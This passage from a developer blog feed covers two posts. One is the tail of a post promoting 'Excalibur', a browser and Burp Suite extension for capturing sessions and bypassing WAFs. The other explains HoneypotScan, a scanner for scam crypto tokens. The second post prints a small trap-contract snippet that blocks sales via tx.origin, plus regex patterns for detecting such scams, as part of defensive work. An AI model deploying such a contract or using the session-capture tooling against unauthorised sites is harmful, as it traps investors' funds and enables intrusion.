(if captured)</li> <li>Timing data for performance analysis</li> <li>Can be imported into Burp, OWASP ZAP, or other security tools</li> </ul> <h3> Cookies JSON (<code>excalibur-session-YYYYMMDD-HHMMSS-cookies.json</code>) </h3> <p>Contains all cookies with:</p> <ul> <li>Domain and path information</li> <li>Expiration dates</li> <li>Secure and HttpOnly flags</li> <li>Perfect for importing into Burp's Cookie Jar or other tools</li> </ul> <h2> Use Cases </h2> <h3> Bug Bounty Hunting </h3> <ul> <li>Capture authenticated sessions to test protected endpoints</li> <li>Bypass WAFs to explore hidden functionality</li> <li>Export session tokens for API testing</li> <li>Document complete request flows for vulnerability reports</li> </ul> <h3> Penetration Testing </h3> <ul> <li>Maintain legitimate sessions during assessments</li> <li>Test APIs behind authentication without credential sharing</li> <li>Document complete attack paths with full request/response data</li> <li>Generate consistent test cases from recorded sessions</li> </ul> <h3> Security Research </h3> <ul> <li>Analyze WAF behavior through legitimate traffic patterns</li> <li>Study CAPTCHA implementations and bypass techniques</li> <li>Document security controls and testing methodologies</li> <li>Create reproducible test scenarios</li> </ul> <h2> Technical Architecture </h2> <p>Excalibur leverages modern browser and security tool APIs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─────────────────┐ │ Chrome Browser │ │ (User solves │ │ CAPTCHAs) │ └────────┬────────┘ │ webRequest API ↓ ┌─────────────────┐ │ Excalibur │ │ Extension │ │ (background.js)│ └────────┬────────┘ │ Export HAR + JSON ↓ ┌─────────────────┐ │ Downloads │ │ .har + .json │ └────────┬────────┘ │ Manual Import ↓ ┌─────────────────┐ │ Burp Suite │ │ Excalibur Tab │ │ (Python Ext.) │ └─────────────────┘ </code></pre> </div> <h3> Chrome Extension </h3> <ul> <li>Uses <code>webRequest</code> API for traffic interception</li> <li>Service worker for background recording</li> <li>Chrome Storage API for state management</li> <li>Popup and DevTools panel for user interaction</li> </ul> <h3> Burp Suite Extension </h3> <ul> <li>IBurpExtender interface for Burp integration</li> <li>Swing-based UI matching Chrome extension design</li> <li>Jython support for compatibility</li> <li>Message registration for request interception</li> </ul> <h2> Security &amp; Ethical Considerations </h2> <p>⚠️ <strong>Important</strong>: Excalibur is designed for legitimate security testing only:</p> <ul> <li>Only test applications you have permission to test</li> <li>Use for bug bounty programs, penetration testing engagements, or your own applications</li> <li>Respect rate limits and avoid excessive traffic</li> <li>Document findings responsibly and disclose issues through proper channels</li> <li>Follow ethical guidelines and legal requirements</li> </ul> <p>Excalibur helps security professionals do their jobs more efficiently — it doesn't replace proper authorization and responsible disclosure.</p> <h2> What's New in v2.0? </h2> <ul> <li> <strong>Modernized UI</strong> with gradient-based design</li> <li> <strong>Enhanced DevTools integration</strong> for better monitoring</li> <li> <strong>Improved HAR export</strong> with better compatibility</li> <li> <strong>Expanded Burp Suite features</strong> including session replay</li> <li> <strong>Better statistics and logging</strong> for comprehensive analysis</li> <li> <strong>Cross-platform support</strong> for Windows, macOS, and Linux</li> </ul> <h2> Getting Started </h2> <p>The project is open source and available on GitHub. Clone the repository, install both components, and start bypassing WAFs and capturing sessions for your security testing workflows.</p> <h3> Resources </h3> <ul> <li>⭐ <a href="https://github.com/yourusername/excalibur" rel="noopener noreferrer">GitHub Repository</a> - Source code and documentation</li> <li>📖 <a href="https://github.com/yourusername/excalibur/blob/main/README.md" rel="noopener noreferrer">Full Documentation</a> - Detailed setup and usage guide</li> <li>🐛 <a href="https://github.com/yourusername/excalibur/issues" rel="noopener noreferrer">Report Issues</a> - Bug reports and feature requests</li> </ul> <h2> Conclusion </h2> <p>Excalibur fills a critical gap in the security researcher's toolkit by bridging manual browser interaction with automated security testing. Whether you're hunting bugs on HackerOne, conducting penetration tests, or researching WAF bypass techniques, Excalibur streamlines the workflow and lets you focus on what matters — finding vulnerabilities.</p> <p>Stop spending hours manually copying cookies and constructing requests. Install Excalibur, record your session, and import it into your favorite security testing tools.</p> <p><strong>Happy hunting!</strong> 🎯</p> <p><em>Excalibur is released under the MIT License. Built by security professionals for security professionals.</em></p> security bugbounty websecurity waf Teycir Ben Soltane Sat, 31 Jan 2026 22:23:07 +0000 https://forem.com/teycir/building-a-honeypot-scanner-that-handles-2m-scansday-for-0-d6a https://forem.com/teycir/building-a-honeypot-scanner-that-handles-2m-scansday-for-0-d6a <h1> Building a Honeypot Scanner That Handles 2M Scans/Day for $0 </h1> <p>I built <a href="https://honeypotscan.pages.dev" rel="noopener noreferrer">HoneypotScan</a> to detect malicious crypto tokens that trap your funds. Here's how I architected it to handle massive scale without spending a dime on infrastructure.</p> <h2> The Problem: Honeypot Tokens </h2> <p>A honeypot token is a scam smart contract that lets you buy tokens but blocks you from selling. Scammers exploit the difference between <code>tx.origin</code> and <code>msg.sender</code> in Solidity:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>// Malicious code example function transfer(address to, uint256 amount) public returns (bool) { require(tx.origin == msg.sender, "No DEX sells allowed"); // Transfer logic... } </code></pre> </div> <p>When you buy directly: <code>tx.origin == msg.sender</code> ✅<br><br> When you sell via Uniswap: <code>tx.origin != msg.sender</code> ❌</p> <p>The transaction reverts. Your funds are trapped forever.</p> <h2> Architecture Overview </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─────────────────┐ │ Next.js 16 │ Frontend (Cloudflare Pages) │ React 19 │ └────────┬────────┘ │ ▼ ┌─────────────────┐ │ Cloudflare │ Edge API (300+ locations) │ Workers │ - Input validation └────────┬────────┘ - Pattern detection │ - Response caching ▼ ┌─────────────────┐ │ Cloudflare KV │ Global cache (24hr TTL) └────────┬────────┘ 95% hit rate │ ▼ ┌─────────────────┐ │ Etherscan API │ Source code retrieval │ (6 keys) │ Rotation for rate limits └─────────────────┘ </code></pre> </div> <h2> Why Cloudflare Workers + KV? </h2> <h3> 1. Edge Computing = Consistent Latency </h3> <p>Workers run at 300+ edge locations globally. Whether you're in Tokyo or London, you get ~2 second response times. No cold starts, no regional bottlenecks.</p> <h3> 2. KV Caching = Massive Cost Savings </h3> <p>Smart contracts are immutable after deployment. This means aggressive caching:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Check cache first</span> <span class="kd">const</span> <span class="nx">cached</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">env</span><span class="p">.</span><span class="nx">HONEYPOT_CACHE</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">address</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">cached</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">cached</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Fetch from Etherscan</span> <span class="kd">const</span> <span class="nx">sourceCode</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetchFromEtherscan</span><span class="p">(</span><span class="nx">address</span><span class="p">);</span> <span class="c1">// Cache for 24 hours</span> <span class="k">await</span> <span class="nx">env</span><span class="p">.</span><span class="nx">HONEYPOT_CACHE</span><span class="p">.</span><span class="nf">put</span><span class="p">(</span> <span class="nx">address</span><span class="p">,</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">result</span><span class="p">),</span> <span class="p">{</span> <span class="na">expirationTtl</span><span class="p">:</span> <span class="mi">86400</span> <span class="p">}</span> <span class="p">);</span> </code></pre> </div> <p>With 95% cache hit rate:</p> <ul> <li>100k Worker requests/day (free tier)</li> <li>100k KV reads/day (free tier)</li> <li>= <strong>2M potential scans/day</strong> </li> <li>= <strong>$0/month</strong> </li> </ul> <h3> 3. Built-in DDoS Protection </h3> <p>Cloudflare's edge network handles DDoS attacks automatically. When someone tried to spam my API, I didn't even notice until I checked the logs.</p> <h2> Detection Algorithm </h2> <h3> Pattern-Based Static Analysis </h3> <p>I use 13 regex patterns to detect honeypot techniques:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">patterns</span> <span class="o">=</span> <span class="p">[</span> <span class="c1">// Core ERC20 abuse</span> <span class="sr">/function</span><span class="se">\s</span><span class="sr">+balanceOf</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="sr">/function</span><span class="se">\s</span><span class="sr">+allowance</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="sr">/function</span><span class="se">\s</span><span class="sr">+transfer</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="c1">// Hidden helpers</span> <span class="sr">/function</span><span class="se">\s</span><span class="sr">+_taxPayer</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="sr">/function</span><span class="se">\s</span><span class="sr">+_isSuper</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="c1">// Auth bypasses</span> <span class="sr">/require</span><span class="se">\s</span><span class="sr">*</span><span class="se">\([^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="sr">/if</span><span class="se">\s</span><span class="sr">*</span><span class="se">\([^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin</span><span class="se">[^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*==|!=/</span><span class="p">,</span> <span class="sr">/assert</span><span class="se">\s</span><span class="sr">*</span><span class="se">\([^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*tx</span><span class="se">\.</span><span class="sr">origin/</span><span class="p">,</span> <span class="sr">/</span><span class="se">\[</span><span class="sr">tx</span><span class="se">\.</span><span class="sr">origin</span><span class="se">\]</span><span class="sr">/</span><span class="p">,</span> <span class="c1">// Transfer blocks</span> <span class="sr">/_isSuper</span><span class="se">\s</span><span class="sr">*</span><span class="se">\(\s</span><span class="sr">*recipient</span><span class="se">\s</span><span class="sr">*</span><span class="se">\)</span><span class="sr">/</span><span class="p">,</span> <span class="sr">/_canTransfer</span><span class="se">[^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*return</span><span class="se">\s</span><span class="sr">+false/</span><span class="p">,</span> <span class="sr">/require</span><span class="se">\s</span><span class="sr">*</span><span class="se">\([^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*_whitelisted</span><span class="se">\[</span><span class="sr">.*</span><span class="se">\]\s</span><span class="sr">*&amp;&amp;</span><span class="se">\s</span><span class="sr">*_whitelisted</span><span class="se">\[</span><span class="sr">/</span><span class="p">,</span> <span class="sr">/if</span><span class="se">\s</span><span class="sr">*</span><span class="se">\([^</span><span class="sr">)</span><span class="se">]</span><span class="sr">*isPair</span><span class="se">\[</span><span class="sr">.*</span><span class="se">\][^</span><span class="sr">}</span><span class="se">]</span><span class="sr">*</span><span class="se">\)\s</span><span class="sr">*{</span><span class="se">\s</span><span class="sr">*taxAmount</span><span class="se">\s</span><span class="sr">*=.*</span><span class="se">\*\s</span><span class="sr">*9</span><span class="se">[</span><span class="sr">5-9</span><span class="se">]</span><span class="sr">/</span> <span class="p">];</span> </code></pre> </div> <h3> Confidence Scoring </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">patternCount</span> <span class="o">=</span> <span class="nx">patterns</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="nx">p</span> <span class="o">=&gt;</span> <span class="nx">p</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">sourceCode</span><span class="p">)).</span><span class="nx">length</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">patternCount</span> <span class="o">&gt;=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">isHoneypot</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="na">confidence</span><span class="p">:</span> <span class="mi">95</span> <span class="p">};</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">patternCount</span> <span class="o">===</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">isHoneypot</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">confidence</span><span class="p">:</span> <span class="mi">50</span><span class="p">,</span> <span class="na">warning</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Suspicious</span><span class="dl">"</span> <span class="p">};</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">isHoneypot</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">confidence</span><span class="p">:</span> <span class="mi">100</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why threshold = 2?</strong></p> <ul> <li>Real honeypots typically show 3-7 patterns</li> <li>Legitimate contracts rarely show &gt;1 pattern</li> <li>Minimizes false positives while maintaining 98% sensitivity</li> </ul> <h2> Implementation Details </h2> <h3> 1. Input Validation </h3> <p>Proper EIP-55 checksum validation using keccak256:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">keccak256</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@noble/hashes/sha3</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">bytesToHex</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@noble/hashes/utils</span><span class="dl">'</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">isValidChecksum</span><span class="p">(</span><span class="nx">address</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="nx">boolean</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">addr</span> <span class="o">=</span> <span class="nx">address</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">2</span><span class="p">).</span><span class="nf">toLowerCase</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nf">bytesToHex</span><span class="p">(</span><span class="nf">keccak256</span><span class="p">(</span><span class="nx">addr</span><span class="p">));</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">40</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">hashChar</span> <span class="o">=</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">hash</span><span class="p">[</span><span class="nx">i</span><span class="p">],</span> <span class="mi">16</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">hashChar</span> <span class="o">&gt;=</span> <span class="mi">8</span> <span class="o">&amp;&amp;</span> <span class="nx">addr</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">!==</span> <span class="nx">addr</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nf">toUpperCase</span><span class="p">())</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">hashChar</span> <span class="o">&lt;</span> <span class="mi">8</span> <span class="o">&amp;&amp;</span> <span class="nx">addr</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">!==</span> <span class="nx">addr</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nf">toLowerCase</span><span class="p">())</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="kc">true</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> 2. API Key Rotation </h3> <p>6 Etherscan API keys with random selection to distribute load:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">API_KEYS</span> <span class="o">=</span> <span class="p">[</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_1</span><span class="p">,</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_2</span><span class="p">,</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_3</span><span class="p">,</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_4</span><span class="p">,</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_5</span><span class="p">,</span> <span class="nx">env</span><span class="p">.</span><span class="nx">ETHERSCAN_API_KEY_6</span><span class="p">,</span> <span class="p">];</span> <span class="kd">const</span> <span class="nx">randomKey</span> <span class="o">=</span> <span class="nx">API_KEYS</span><span class="p">[</span><span class="nb">Math</span><span class="p">.</span><span class="nf">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nf">random</span><span class="p">()</span> <span class="o">*</span> <span class="nx">API_KEYS</span><span class="p">.</span><span class="nx">length</span><span class="p">)];</span> </code></pre> </div> <h3> 3. Request Timeout Protection </h3> <p>10-second timeout with AbortController:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">controller</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">AbortController</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">timeoutId</span> <span class="o">=</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="nx">controller</span><span class="p">.</span><span class="nf">abort</span><span class="p">(),</span> <span class="mi">10000</span><span class="p">);</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span> <span class="na">signal</span><span class="p">:</span> <span class="nx">controller</span><span class="p">.</span><span class="nx">signal</span> <span class="p">});</span> <span class="c1">// Process response...</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">error</span><span class="p">.</span><span class="nx">name</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">AbortError</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Request timeout</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">throw</span> <span class="nx">error</span><span class="p">;</span> <span class="p">}</span> <span class="k">finally</span> <span class="p">{</span> <span class="nf">clearTimeout</span><span class="p">(</span><span class="nx">timeoutId</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> 4. Code Sanitization </h3> <p>Remove comments and normalize whitespace before pattern matching:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">sanitizeCode</span><span class="p">(</span><span class="nx">code</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="kr">string</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">code</span> <span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\/\*[\s\S]</span><span class="sr">*</span><span class="se">?\*\/</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">''</span><span class="p">)</span> <span class="c1">// Block comments</span> <span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\/\/</span><span class="sr">.*/g</span><span class="p">,</span> <span class="dl">''</span><span class="p">)</span> <span class="c1">// Line comments</span> <span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\s</span><span class="sr">+/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span><span class="p">)</span> <span class="c1">// Normalize whitespace</span> <span class="p">.</span><span class="nf">trim</span><span class="p">();</span> <span class="p">}</span> </code></pre> </div> <h2> Security Features </h2> <h3> CORS Whitelist </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">ALLOWED_ORIGINS</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">https://honeypotscan.pages.dev</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">https://www.honeypotscan.com</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://localhost:3000</span><span class="dl">'</span><span class="p">,</span> <span class="p">];</span> <span class="kd">function</span> <span class="nf">handleCORS</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">):</span> <span class="nx">Response</span> <span class="o">|</span> <span class="kc">null</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">origin</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">Origin</span><span class="dl">'</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">origin</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nx">ALLOWED_ORIGINS</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">origin</span><span class="p">))</span> <span class="p">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Response</span><span class="p">(</span><span class="dl">'</span><span class="s1">Forbidden</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">status</span><span class="p">:</span> <span class="mi">403</span> <span class="p">});</span> <span class="p">}</span> <span class="k">return</span> <span class="kc">null</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Content Security Policy </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">CSP</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">"</span><span class="s2">default-src 'self'</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">script-src 'self' 'unsafe-inline' 'unsafe-eval'</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">style-src 'self' 'unsafe-inline'</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">connect-src 'self' https://honeypotscan-api.teycircoder4.workers.dev</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">frame-ancestors 'none'</span><span class="dl">"</span><span class="p">,</span> <span class="p">].</span><span class="nf">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">; </span><span class="dl">'</span><span class="p">);</span> <span class="nx">response</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nf">set</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-Security-Policy</span><span class="dl">'</span><span class="p">,</span> <span class="nx">CSP</span><span class="p">);</span> </code></pre> </div> <h3> Rate Limiting </h3> <p>Simple in-memory rate limiting (resets every minute):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">rateLimits</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Map</span><span class="o">&lt;</span><span class="kr">string</span><span class="p">,</span> <span class="kr">number</span><span class="o">&gt;</span><span class="p">();</span> <span class="kd">function</span> <span class="nf">checkRateLimit</span><span class="p">(</span><span class="nx">ip</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="nx">boolean</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">rateLimits</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">ip</span><span class="p">)</span> <span class="o">||</span> <span class="mi">0</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">count</span> <span class="o">&gt;=</span> <span class="mi">30</span><span class="p">)</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="nx">rateLimits</span><span class="p">.</span><span class="nf">set</span><span class="p">(</span><span class="nx">ip</span><span class="p">,</span> <span class="nx">count</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span> <span class="k">return</span> <span class="kc">true</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h2> Frontend Features </h2> <h3> Share Results via URL Hash </h3> <p>Results encoded in URL hash (no server needed):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">shareResult</span><span class="p">(</span><span class="nx">result</span><span class="p">:</span> <span class="nx">ScanResult</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">encoded</span> <span class="o">=</span> <span class="nf">btoa</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">result</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">origin</span><span class="p">}</span><span class="s2">#result=</span><span class="p">${</span><span class="nx">encoded</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nb">navigator</span><span class="p">.</span><span class="nx">clipboard</span><span class="p">.</span><span class="nf">writeText</span><span class="p">(</span><span class="nx">url</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// On page load</span> <span class="kd">const</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">#result=</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">encoded</span> <span class="o">=</span> <span class="nx">hash</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">8</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nf">atob</span><span class="p">(</span><span class="nx">encoded</span><span class="p">));</span> <span class="nf">displayResult</span><span class="p">(</span><span class="nx">result</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Local Scan History </h3> <p>Last 10 scans stored in localStorage:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">saveToHistory</span><span class="p">(</span><span class="nx">result</span><span class="p">:</span> <span class="nx">ScanResult</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">history</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">localStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">scanHistory</span><span class="dl">'</span><span class="p">)</span> <span class="o">||</span> <span class="dl">'</span><span class="s1">[]</span><span class="dl">'</span><span class="p">);</span> <span class="nx">history</span><span class="p">.</span><span class="nf">unshift</span><span class="p">(</span><span class="nx">result</span><span class="p">);</span> <span class="nx">history</span><span class="p">.</span><span class="nf">splice</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> <span class="c1">// Keep only last 10</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">setItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">scanHistory</span><span class="dl">'</span><span class="p">,</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">history</span><span class="p">));</span> <span class="p">}</span> </code></pre> </div> <h3> Export as JSON </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">exportResult</span><span class="p">(</span><span class="nx">result</span><span class="p">:</span> <span class="nx">ScanResult</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="p">{</span> <span class="na">scanner</span><span class="p">:</span> <span class="dl">'</span><span class="s1">HoneypotScan</span><span class="dl">'</span><span class="p">,</span> <span class="na">version</span><span class="p">:</span> <span class="dl">'</span><span class="s1">1.0</span><span class="dl">'</span><span class="p">,</span> <span class="na">scannedAt</span><span class="p">:</span> <span class="k">new</span> <span class="nc">Date</span><span class="p">().</span><span class="nf">toISOString</span><span class="p">(),</span> <span class="nx">result</span><span class="p">,</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">blob</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Blob</span><span class="p">([</span><span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mi">2</span><span class="p">)],</span> <span class="p">{</span> <span class="na">type</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span><span class="p">,</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="nx">URL</span><span class="p">.</span><span class="nf">createObjectURL</span><span class="p">(</span><span class="nx">blob</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">a</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">);</span> <span class="nx">a</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="nx">url</span><span class="p">;</span> <span 